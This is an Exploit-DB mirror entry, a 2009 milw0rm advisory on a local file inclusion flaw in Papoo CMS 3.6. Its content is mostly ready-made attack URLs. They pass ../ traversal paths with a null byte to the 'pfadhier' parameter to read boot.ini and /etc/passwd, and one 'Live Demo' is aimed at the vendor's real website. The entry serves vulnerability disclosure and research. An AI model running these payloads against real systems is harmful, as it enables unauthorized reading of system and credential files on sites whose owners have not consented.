exploit-db-mirror/exploits/php/webapps/8030.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
869 B
Text

#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################
[+] Script Homepage : http://www.papoo-cms.com/
[+] Local File Inclusion
- PoC :
http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00
- Example :
http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00
- Live Demo
http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00
#########################################################################################################
# milw0rm.com [2009-02-10]